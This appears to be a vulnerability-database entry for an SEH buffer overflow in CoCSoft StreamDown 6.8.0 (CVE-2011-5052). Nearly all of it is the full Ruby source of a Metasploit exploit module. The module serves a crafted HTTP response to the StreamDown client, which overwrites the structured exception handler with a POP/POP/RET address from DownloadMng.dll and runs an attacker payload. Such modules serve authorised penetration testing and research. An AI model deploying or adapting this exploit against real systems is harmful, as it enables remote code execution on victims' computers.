CoCSoft StreamDown 6.8.0 Buffer Overflow

2011-12-3016:16:29

Fady Mohamed Osman <[email protected]>

www.rapid7.com

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS

0.065

Percentile

93.9%

JSON

Stream Down 6.8.0 seh based buffer overflow triggered when processing the server response packet. During the overflow a structured exception handler is overwritten.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
      'Description'    => %q{
        Stream Down 6.8.0 seh based buffer overflow triggered when processing
        the server response packet. During the overflow a structured exception
        handler is overwritten.
      },
      'Author'         => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
      'References'	 =>
        [
          ['CVE', '2011-5052'],
          ['OSVDB', '78043'],
          ['BID', '51190'],
          ['URL', 'http://www.dark-masters.tk/'],
          ['URL', 'http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343'],
          ['EDB', '18283']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'BadChars' => "\x00\xff\x0a"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'StreamDown 6.8.0',
            {
              'Offset' => 16388,
              'Ret'    => 0x10019448 #POP/POP/RET in DownloadMng.dll
            }
          ],
        ],
        'DisclosureDate' => '2011-12-27', # as an actual security bug
        'DefaultTarget' => 0,
      'License'       => MSF_LICENSE
    ))
  end

  def on_request_uri(cli,request)
    vprint_status("Requested: #{request.uri}")

    # No point to continue if the client isn't what we interested in
    ua = request.headers['User-Agent']
    if ua !~ /CoCSoft Stream Download/i
      print_error("Target not supported: #{ua}")
      send_not_found(cli)
      return
    end

    nseh = "\xeb\x06" + rand_text_alpha(2)
    seh = [target.ret].pack('V')
    offset_to_nseh = target['Offset']
    nops = make_nops(10)
    sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
    cli.put(sploit)
    close_client(cli)
  end
end